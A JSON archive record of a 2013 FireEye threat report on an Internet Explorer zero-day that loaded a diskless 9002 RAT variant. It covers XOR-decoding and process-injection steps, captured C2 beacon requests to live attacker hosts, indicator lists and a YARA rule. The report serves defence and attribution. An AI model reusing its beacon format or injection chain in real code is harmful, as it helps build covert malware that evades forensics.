{ "id": "53f4e7f0-c3f5-4f37-b230-63671fa1d81e", "created_at": "2026-04-06T00:13:58.9921Z", "updated_at": "2026-04-10T03:37:58.741126Z", "deleted_at": null, "sha1_hash": "8bec79106c1efb07cad4dfe4cd92a2748e8c7fc1", "title": "Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method « Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 748660, "plain_text": "Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog\r\nUses Diskless Method « Operation Ephemeral Hydra: IE Zero-Day\r\nLinked to DeputyDog Uses Diskless Method\r\nBy by Ned Moran, Sai Omkar Vashisht, Mike Scott, Thoufique Haq\r\nPublished: 2013-11-10 · Archived: 2026-04-05 19:58:58 UTC\r\nRecently, we discovered a new IE zero-day exploit in the wild, which has been used in a strategic Web\r\ncompromise. Specifically, the attackers inserted this zero-day exploit into a strategically important website, known\r\nto draw visitors that are likely interested in national and international security policy. We have identified\r\nrelationships between the infrastructure used in this attack and that used in Operation DeputyDog.\r\nFurthermore, the attackers loaded the payload used in this attack directly into memory without first writing\r\nto disk – a technique not typically used by advanced persistent threat (APT) actors. This technique will further\r\ncomplicate network defenders’ ability to triage compromised systems, using traditional forensics methods.\r\nEnter Trojan.APT.9002\r\nOn November 8, 2013 our colleagues Xiaobo Chen and Dan Caselden posted about a new Internet Explorer 0-day\r\nexploit seen in the wild. This exploit was seen used in a strategic Web compromise. The exploit chain was limited\r\nto one website. There were no iframes or redirects to external sites to pull down the shellcode payload.\r\nThrough the FireEye Dynamic Threat Intelligence (DTI) cloud, we were able to retrieve the payload dropped in\r\nthe attack. This payload has been identified as a variant of Trojan.APT.9002 (aka Hydraq/McRAT variant) and\r\nruns in memory only. It does not write itself to disk, leaving little to no artifacts that can be used to identify\r\ninfected endpoints.\r\nSpecifically, the payload is shellcode, which is decoded and directly injected into memory after successful\r\nexploitation via a series of steps. After an initial XOR decoding of the payload with the key \"0x9F\", an instance\r\nof rundll32.exe is launched and injected with the payload using CreateProcessA, OpenProcess, VirtualAlloc,\r\nWriteProcessMemory, and CreateRemoteThread.\r\nhttps://web.archive.org/web/20190221032148/http://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html\r\nPage 1 of 9\n\nFigure 1 - Initial XOR decoding of shellcode, with key '0x9F'\r\nFigure 2 – Shellcode launches rundll32.exe and injects payload\r\nhttps://web.archive.org/web/20190221032148/http://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html\r\nPage 2 of 9\n\nAfter transfer of control to the injected payload in rundll32.exe, the shellcode is then subjected to two more levels\r\nof XOR decoding with the keys '0x01', followed by '0x6A'.\r\nFigure 3- Decoding shellcode with XOR key '0x01'\r\nFigure 4 - Decoding shellcode with XOR key '0x6A'\r\nProcess execution is then transferred to the final decoded payload, which is a variant of the 9002 RAT.\r\nFigure 5 - Transfer of process execution to final decoded payload\r\nThe fact that the attackers used a non-persistent first stage payload suggests that they are confident in both\r\ntheir resources and skills. As the payload was not persistent, the attackers had to work quickly, in order to\r\ngain control of victims and move laterally within affected organizations. If the attacker did not immediately\r\nseize control of infected endpoints, they risked losing these compromised endpoints, as the endpoints could\r\nhttps://web.archive.org/web/20190221032148/http://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html\r\nPage 3 of 9\n\nhave been rebooted at any time – thus automatically wiping the in-memory Trojan.APT.9002 malware\r\nvariant from the infected endpoint.\r\nAlternatively, the use of this non-persistent first stage may suggest that the attackers were confident that their\r\nintended targets would simply revisit the compromised website and be re-infected.\r\nCommand and Control Protocol and Infrastructure\r\nThis Trojan.APT.9002 variant connected to a command and control server at 111.68.9.93 over port 443. It uses a\r\nnon-HTTP protocol as well as an HTTP POST for communicating with the remote server. However, the\r\ncallback beacons have changed in this version, in comparison to the older 9002 RATs.\r\nThe older traditional version of 9002 RAT had a static 4-byte identifier at offset 0 in the callback network traffic.\r\nThis identifier was typically the string \"9002\", but we have also seen variants, where this has been modified –\r\nsuch as the 9002 variant documented in the Sunshop campaign.\r\nFigure 6 - Traditional 9002 RAT callback beacon\r\nIn contrast, the beacon from the diskless 9002 payload used in the current IE 0-day attack is remarkably\r\ndifferent and uses a dynamic 4-byte XOR key to encrypt the data. This 4-byte key is present at offset 0 and\r\nchanges with each subsequent beacon. FireEye labs is aware that the 4-byte XOR version of 9002 has been\r\nin the wild for a while and is used by multiple APT actors, but this is the first time we’ve seen it deployed in\r\nthe diskless payload method.\r\nFigure 7 - Sample callback beacons of the diskless 9002 RAT payload\r\nhttps://web.archive.org/web/20190221032148/http://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html\r\nPage 4 of 9\n\nFigure 8 - XOR decrypted callback beacons of the diskless 9002 RAT payload\r\nThe XOR decoded data always contains the static value \"\\x09\\x12\\x11\\x20\" at offset 16. This value is in fact\r\nhardcoded in packet data construction function prior to XOR encoding. This value most likely is the date \"2011-\r\n12-09\" but its significance is not known at this time.\r\nhttps://web.archive.org/web/20190221032148/http://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html\r\nPage 5 of 9\n\nFigure 9 - Packet data construction function showing hardcoded value\r\nThe diskless 9002 RAT payload also makes a POST request, which has also changed from the traditional version.\r\nIt has Base64 stub data, instead of the static string \"AA\". The User-Agent string and URI pattern remain the\r\nsame however. It uses the static string \"lynx\" in the User-Agent string and the URI is incremental hexadecimal\r\nvalues.\r\nTraditional 9002 RAT Diskless 9002 RAT\r\nPOST /4 HTTP/1.1\r\nUser-Agent: lynx\r\nHost: ieee.boeing-job.com\r\nContent-Length: 2\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nAA\r\nPOST /2 HTTP/1.1\r\nUser-Agent: lynx\r\nHost: 111.68.9.93:443\r\nContent-Length: 104\r\nConnection: Keep-Alive\r\nhttps://web.archive.org/web/20190221032148/http://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html\r\nPage 6 of 9\n\nPOST /4 HTTP/1.1\r\nUser-Agent: lynx\r\nHost: ieee.boeing-job.com\r\nContent-Length: 2\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nAA\r\nCache-Control: no-cache\r\nwUeAKsFHgCrBR4AqwUeAKshVkQrBR4Aqw\r\nUeAKsFHgCrBR4AqwUeAKsFHgCrBR4Aqw\r\nUeAKsFHgCrBR4AqwUeAKsFHgCrBR4AqwUe\r\nAKg==\r\nPOST /2 HTTP/1.1\r\nUser-Agent: lynx\r\nHost: 111.68.9.93:443\r\nContent-Length: 104\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nwUeAKsFHgCrBR4AqwUeAKshVkQrBR4Aqw\r\nUeAKsFHgCrBR4AqwUeAKsFHgCrBR4Aqw\r\nUeAKsFHgCrBR4AqwUeAKsFHgCrBR4AqwUe\r\nAKg==\r\nThe data in the POST stub is also encrypted with a 4-byte XOR key, and when decrypted, the data is similar to the\r\ndata in the non-HTTP beacon and also has the static value \"\\x09\\x12\\x11\\x20\".\r\nCampaign Analysis\r\nWe previously observed 104130d666ab3f640255140007f0b12d connecting to the same 111.68.9.93 IP address.\r\nAnalysis of MD5 104130d666ab3f640255140007f0b12d revealed that it shared unique identifying characteristics\r\nwith 90a37e54c53ffb78969644b1a7038e8c, acbc249061a6a2fb09271a68d53567d9, and\r\n20854f54b0d03118681410245be39bd8.\r\nMD5 acbc249061a6a2fb09271a68d53567d9 and 90a37e54c53ffb78969644b1a7038e8c are both Trojan.APT.9002\r\nvariants and connect to a command and control server at 58.64.143.244.\r\nMD5 20854f54b0d03118681410245be39bd8 is another Trojan.APT.9002 variant. This variant connected to a\r\ncommand and control server at ad04.bounceme.net.\r\nPassive DNS analysis of this domain revealed that it resolved to 58.64.213.104 between 2011-09-23 and 2011-10-\r\n21. The following other domains have also been seen resolving to this same IP address:\r\nDomain First Seen Last Seen\r\ndll.freshdns.org dll.freshdns.org 2011-12-08 2011-12-08 2012-01-31 2012-01-31\r\ngrado.selfip.com grado.selfip.com 2011-12-23 2011-12-23 2012-01-10 2012-01-10\r\nusc-data.suroot.com usc-data.suroot.com 2012-02-20 2012-02-20 2012-02-22 2012-02-22\r\nhttps://web.archive.org/web/20190221032148/http://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html\r\nPage 7 of 9\n\nusa-mail.scieron.com usa-mail.scieron.com 2011-12-01 2011-12-01 2012-02-22 2012-02-22\r\nIf the domain dll.freshdns.org rings a bell, it should. While covering a different Internet Explorer Zero-day (CVE-2013-3893) and the associated Operation DeputyDog campaign, we reported that the CnC infrastructure used in\r\nthat campaign overlapped with this same domain: dll.freshdns.org.\r\nInside the in-memory version of the Trojan.APT.9002 payload used in this strategic Web compromise, we\r\nidentified the following interesting string: “rat_UnInstall”. Through DTI, we found this same string present in\r\na number of different samples including the ones discussed above:\r\n104130d666ab3f640255140007f0b12d\r\n90a37e54c53ffb78969644b1a7038e8c\r\nacbc249061a6a2fb09271a68d53567d9\r\n20854f54b0d03118681410245be39bd8\r\nBased on this analysis, all of these samples, including the in-memory variant, can be detected with the following\r\nsimple YARA signature:\r\nrule FE_APT_9002_rat\r\n{\r\n    meta:\r\n        author = \"FireEye Labs\"\r\n    strings:\r\n        $mz = {4d 5a}\r\n        $a = \"rat_UnInstall\" wide ascii\r\n    condition:\r\n        ($mz at 0) and $a\r\n}\r\nWe also found the following strings of interest present in these above 9002 RAT samples (excluding the in-memory variant):\r\nMcpRoXy.exe\r\nSoundMax.dll\r\nThese strings were all observed and highlighted by Bit9 here. As Bit9 notes in their blog, Trojan.APT.9002 (aka\r\nHydraq/McRAT) was also used in the original Operation Aurora campaign, and the “rat_UnInstall” string\r\nhttps://web.archive.org/web/20190221032148/http://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html\r\nPage 8 of 9\n\ncan be found in the original Aurora samples confirming the lineage.\r\nConclusions\r\nBy utilizing strategic Web compromises along with in-memory payload delivery tactics and multiple nested\r\nmethods of obfuscation, this campaign has proven to be exceptionally accomplished and elusive. APT actors are\r\nclearly learning and employing new tactics. With uncanny timing and a penchant for consistently employing\r\nZero-day exploits in targeted attacks, we expect APT threat actors to continue to evolve and launch new\r\ncampaigns for the foreseeable future. Not surprisingly, these old dogs continue to learn new tricks.\r\nFireEye Labs would like to thank iSIGHT Partners for their assistance with this research.\r\nSource: https://web.archive.org/web/20190221032148/http://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zer\r\no-day-linked-to-deputydog-uses-diskless-method.html\r\nhttps://web.archive.org/web/20190221032148/http://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html\r\nPage 9 of 9\n\nvalues. Traditional 9002 RAT Diskless 9002 RAT\nPOST /4 HTTP/1.1 POST /2 HTTP/1.1\nUser-Agent: lynx User-Agent: lynx\nHost: ieee.boeing-job.com Host: 111.68.9.93:443 \nContent-Length: 2 Content-Length: 104\nConnection: Keep-Alive Connection: Keep-Alive\nCache-Control: no-cache \nAA \n Page 6 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://web.archive.org/web/20190221032148/http://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html" ], "report_names": [ "operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html" ], "threat_actors": [ { "id": "ee39ecf0-d311-49e5-b0ae-3e3d71f71def", "created_at": "2025-08-07T02:03:24.626625Z", "updated_at": "2026-04-10T02:00:03.605175Z", "deleted_at": null, "main_name": "BRONZE KEYSTONE", "aliases": [ "APT17 ", "Aurora Panda ", "DeputyDog ", "Group 72 ", "Hidden Lynx ", "TG-8153 ", "Tailgater Team" ], "source_name": "Secureworks:BRONZE KEYSTONE", "tools": [ "9002", "BlackCoffee", "DeputyDog", "Derusbi", "Gh0stHTTPSDropper", "HiKit", "InternalCMD", "PlugX", "PoisonIvy", "ZxShell" ], "source_id": "Secureworks", "reports": null }, { "id": "86fd71d3-06dc-4b73-b038-cedea7b83bac", "created_at": "2022-10-25T16:07:23.330793Z", "updated_at": "2026-04-10T02:00:04.545236Z", "deleted_at": null, "main_name": "APT 17", "aliases": [ "APT 17", "ATK 2", "Beijing Group", "Bronze Keystone", "Deputy Dog", "Elderwood", "Elderwood Gang", "G0025", "G0066", "Operation Aurora", "Operation DeputyDog", "Operation Ephemeral Hydra", "Operation RAT Cook", "SIG22", "Sneaky Panda", "TEMP.Avengers", "TG-8153", "Tailgater Team" ], "source_name": "ETDA:APT 17", "tools": [ "9002 RAT", "AGENT.ABQMR", "AGENT.AQUP.DROPPER", "AGENT.BMZA", "AGENT.GUNZ", "Agent.dhwf", "AngryRebel", "BlackCoffee", "Briba", "Chymine", "Comfoo", "Comfoo RAT", "Darkmoon", "DeputyDog", "Destroy RAT", "DestroyRAT", "Farfli", "Fexel", "Gen:Trojan.Heur.PT", "Gh0st RAT", "Ghost RAT", "Gresim", "HOMEUNIX", "HiKit", "HidraQ", "Homux", "Hydraq", "Jumpall", "Kaba", "Korplug", "Linfo", "MCRAT.A", "McRAT", "MdmBot", "Mdmbot.E", "Moudour", "Mydoor", "Naid", "Nerex", "PCRat", "PNGRAT", "Pasam", "PlugX", "Poison Ivy", "RedDelta", "Roarur", "SPIVY", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Trojan.Naid", "Vasport", "Wiarp", "Xamtrav", "Zox", "ZoxPNG", "ZoxRPC", "gresim", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434438, "ts_updated_at": 1775792278, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8bec79106c1efb07cad4dfe4cd92a2748e8c7fc1.pdf", "text": "https://archive.orkl.eu/8bec79106c1efb07cad4dfe4cd92a2748e8c7fc1.txt", "img": "https://archive.orkl.eu/8bec79106c1efb07cad4dfe4cd92a2748e8c7fc1.jpg" } }